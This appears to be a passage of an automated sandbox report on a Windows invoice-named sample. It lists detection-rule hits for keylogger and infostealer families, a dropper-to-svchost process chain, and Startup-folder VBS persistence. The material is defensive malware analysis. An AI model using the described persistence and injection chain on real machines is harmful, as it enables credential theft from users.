              Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.svchost.exe.7d30f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.3.svchost.exe.366e000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000008.00000002.2543753566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.1322250001.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0000000A.00000002.1448696408.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: svchost.exe PID: 7344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: FACT0987789000900.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9888239459509658
              Source: juvenile.exe.3.drStatic PE information: Section: UPX1 ZLIB complexity 0.9888239459509658
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpack, -R.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.3374f2e.1.raw.unpack, -R.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.svchost.exe.7e90000.4.raw.unpack, -R.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.3.svchost.exe.326df20.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: juvenile.exe, 00000006.00000002.1321448784.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BS;.VBP
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DCE7A GetLastError,FormatMessageW,3_2_004DCE7A
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004CAB84 AdjustTokenPrivileges,CloseHandle,3_2_004CAB84
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004CB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_004CB134
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0090AB84 AdjustTokenPrivileges,CloseHandle,6_2_0090AB84
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0090B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_0090B134
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_004DE1FD
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,3_2_004D6532
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004EC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,3_2_004EC18C
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_0049406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_0049406B
              Source: C:\Users\user\Desktop\FACT0987789000900.exeFile created: C:\Users\user\AppData\Local\thixolabileJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
              Source: C:\Users\user\Desktop\FACT0987789000900.exeFile created: C:\Users\user~1\AppData\Local\Temp\autC090.tmpJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: svchost.exe, 00000008.00000002.2547584481.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057BB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057FB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.00000000057C9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A14000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005A06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: FACT0987789000900.exeReversingLabs: Detection: 71%
              Source: FACT0987789000900.exeVirustotal: Detection: 80%
              Source: C:\Users\user\Desktop\FACT0987789000900.exeFile read: C:\Users\user\Desktop\FACT0987789000900.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\FACT0987789000900.exe "C:\Users\user\Desktop\FACT0987789000900.exe"
              Source: C:\Users\user\Desktop\FACT0987789000900.exeProcess created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\Desktop\FACT0987789000900.exe"
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FACT0987789000900.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe"
              Source: C:\Users\user\Desktop\FACT0987789000900.exeProcess created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\Desktop\FACT0987789000900.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FACT0987789000900.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" Jump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeSection loaded: uxtheme.dllJump to behavior
